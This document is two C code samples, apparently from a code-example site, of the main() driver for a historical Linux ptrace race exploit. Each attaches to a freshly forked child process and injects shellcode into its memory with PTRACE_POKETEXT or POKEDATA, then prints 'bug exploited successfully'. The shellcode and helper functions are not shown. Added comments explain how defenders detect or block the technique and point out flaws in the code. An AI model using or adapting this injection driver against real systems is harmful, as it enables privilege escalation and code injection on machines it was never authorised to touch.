Exemplo n.º 1
/*
 * Driver side of a historical Linux ptrace race (the victim side,
 * do_victim() and check_execve(), is defined outside this excerpt).
 * Flow as written here: fork a child that runs `filename`, wait for the
 * child to signal readiness, PTRACE_ATTACH to it, copy `shellcode` into
 * the child's text at the saved eip with PTRACE_POKETEXT, write the
 * registers back and detach.
 *
 * Defender's view: the observable behaviour is a PTRACE_ATTACH from a
 * parent onto a freshly started child followed by POKETEXT writes into
 * its code pages.  Auditing the ptrace syscall and restricting who may
 * attach (Yama's ptrace_scope sysctl, seccomp) both make this visible
 * or impossible; the kernel race itself has long been fixed.
 *
 * Returns 0 on success, -1 after SIGKILLing the child when any ptrace
 * step fails.  exit(-1) is called directly if fork() fails.
 */
int
main (int argc, char *argv[])
{
  char *filename = VICTIM;        /* default target, defined elsewhere */
  pid_t victim;
  int error, i;                   /* `error` is never used below */
  struct user_regs_struct regs;

/* take our command args if you wanna play with other progs */
  if (argc > 1)
    filename = argv[1];

  /* cs_detector is presumably raised by cs_sig_handler; both are
     declared outside this excerpt.  If cs_detector is not declared
     volatile sig_atomic_t the busy-wait below may never observe it. */
  signal (CS_SIGNAL, cs_sig_handler);

  victim = fork ();
  if (victim < 0)
  {
    perror ("fork: victim");
    exit (-1);
  }
  /* child: do_victim() is expected not to return (verify in its definition) */
  if (victim == 0)
    do_victim (filename);

  /* tell the child to proceed, then spin until the handler flips the flag */
  kill (victim, CS_SIGNAL);
  while (!cs_detector);

  /* glibc's ptrace() is variadic, so passing only two arguments is accepted */
  if (ptrace (PTRACE_ATTACH, victim))
  {
    perror ("ptrace: PTRACE_ATTACH");
    goto exit;
  }

  /* check_execve() is opaque here; by usage, non-zero means "give up" */
  if (check_execve (victim, filename))
    goto exit;

  /* reap the attach stop, resume, then wait for the next stop */
  (void) waitpid (victim, NULL, WUNTRACED);
  if (ptrace (PTRACE_CONT, victim, 0, 0))
  {
    perror ("ptrace: PTRACE_CONT");
    goto exit;
  }

  (void) waitpid (victim, NULL, WUNTRACED);

  /* snapshot the tracee's registers; regs.eip is the write target below */
  if (ptrace (PTRACE_GETREGS, victim, 0, &regs))
  {
    perror ("ptrace: PTRACE_GETREGS");
    goto exit;
  }

/* make sure that last null is in there */
  /* NOTE(review): `i` is int but strlen() is size_t (signed/unsigned
     compare), and the final iteration reads *(int *) at shellcode+i with
     i == strlen(), i.e. up to 3 bytes past the terminating NUL whenever
     (strlen+1) is not a multiple of 4 -- an out-of-bounds read in this
     process, and an unaligned cast that is UB in strict C. */
  for (i = 0; i <= strlen (shellcode); i += 4)
  {
    if (ptrace (PTRACE_POKETEXT, victim, regs.eip + i,
		*(int *) (shellcode + i)))
    {
      perror ("ptrace: PTRACE_POKETEXT");
      goto exit;
    }
  }

  /* regs was not modified since GETREGS, so this writes back the same values */
  if (ptrace (PTRACE_SETREGS, victim, 0, &regs))
  {
    perror ("ptrace: PTRACE_SETREGS");
    goto exit;
  }

  fprintf (stderr, "bug exploited successfully.\nenjoy!\n");

  if (ptrace (PTRACE_DETACH, victim, 0, 0))
  {
    perror ("ptrace: PTRACE_DETACH");
    goto exit;
  }

  /* wait for the child to finish; its exit status is discarded */
  (void) waitpid (victim, NULL, 0);
  return 0;

/* label named like the libc function exit(); legal (labels have their own
   namespace) but easy to misread */
exit:
  fprintf (stderr, "d0h! error!\n");
  kill (victim, SIGKILL);
  return -1;
}
Exemplo n.º 2
/*
 * Second variant of the same ptrace-race driver (see the first example).
 * Differences visible here: the write address comes from SHELLCODE or a
 * hex argv[2] instead of the tracee's saved eip, PTRACE_POKEDATA is used
 * instead of POKETEXT, and the registers are re-read (PTRACE_GETREGS)
 * rather than written back after the copy.
 *
 * Defender's view is unchanged: a parent attaching to its own freshly
 * started child and poking its memory is the signal to alert on; the
 * ptrace syscall can be audited or restricted (Yama ptrace_scope, seccomp).
 *
 * Returns 0 on success, -1 after SIGKILLing the child on any ptrace
 * failure; exit(-1) if fork() fails.
 */
int main(int argc, char * argv[])
{
	char * filename=VICTIM;          /* default target, defined elsewhere */
	pid_t victim;
	int error, i;                    /* `error` is never used below */
	unsigned long eip=SHELLCODE;     /* default write address, defined elsewhere */
	struct user_regs_struct regs;

	/* NOTE(review): strtoul() with a NULL endptr and no errno check --
	   a non-hex argv[2] silently yields 0 */
	if (argc>1) filename=argv[1];
	if (argc>2) eip=strtoul(argv[2], NULL, 16);

	/* cs_detector is presumably raised by cs_sig_handler; both are
	   declared outside this excerpt.  If cs_detector is not declared
	   volatile sig_atomic_t the busy-wait below may never observe it. */
	signal(CS_SIGNAL, cs_sig_handler);

	victim=fork();
	if (victim<0) {
		perror("fork: victim");
		exit(-1);
	}
	/* child: do_victim() is expected not to return (verify in its definition) */
	if (victim==0) do_victim(filename);

	/* tell the child to proceed, then spin until the handler flips the flag */
	kill(victim, CS_SIGNAL);
	while (!cs_detector) ;
	
	/* glibc's ptrace() is variadic, so passing only two arguments is accepted */
	if (ptrace(PTRACE_ATTACH, victim)) {
		perror("ptrace: PTRACE_ATTACH");
		goto exit;
	}
	
	/* check_execve() is opaque here; by usage, non-zero means "give up" */
	if (check_execve(victim, filename))
		goto exit;

	/* reap the attach stop, resume, then wait for the next stop */
	(void)waitpid(victim, NULL, WUNTRACED);
	if (ptrace(PTRACE_CONT, victim, 0, 0)) {
		perror("ptrace: PTRACE_CONT");
		goto exit;
	}

	(void)waitpid(victim, NULL, WUNTRACED);
	
	if (ptrace(PTRACE_GETREGS, victim, 0, &regs)) {
		perror("ptrace: PTRACE_GETREGS");
		goto exit;
	}

	/* only the local copy is changed here; it is used as the poke base below */
	regs.eip=eip;
	
	/* NOTE(review): `i` is int vs size_t strlen() (signed/unsigned compare),
	   and the last iteration reads *(int*) at shellcode+i, i.e. up to
	   3 bytes past the terminating NUL whenever strlen() is not a multiple
	   of 4 -- an out-of-bounds read here and an unaligned cast that is UB.
	   The perror label says POKETEXT although the request is POKEDATA. */
	for (i=0; i<strlen(shellcode); i+=4) {
		if (ptrace(PTRACE_POKEDATA, victim, regs.eip+i,
						    *(int*)(shellcode+i))) {
			perror("ptrace: PTRACE_POKETEXT");
			goto exit;
		}
	}

	/* regs is refreshed from the tracee; the local eip assignment above is
	   overwritten by this read */
	if (ptrace(PTRACE_GETREGS, victim, 0, &regs)) {
		perror("ptrace: PTRACE_GETREGS");
		goto exit;
	}

	fprintf(stderr, "Bug exploited successfully.\n");
	
	/* perror label says PTRACE_CONT but the failing request is PTRACE_DETACH;
	   keep that in mind when correlating error output */
	if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
		perror("ptrace: PTRACE_CONT");
		goto exit;
	}

	/* wait for the child to finish; its exit status is discarded */
	(void)waitpid(victim, NULL, 0);
	return 0;
	
/* label named like the libc function exit(); legal (labels have their own
   namespace) but easy to misread */
exit:
	fprintf(stderr, "Error!\n");
	kill(victim, SIGKILL);
	return -1;
}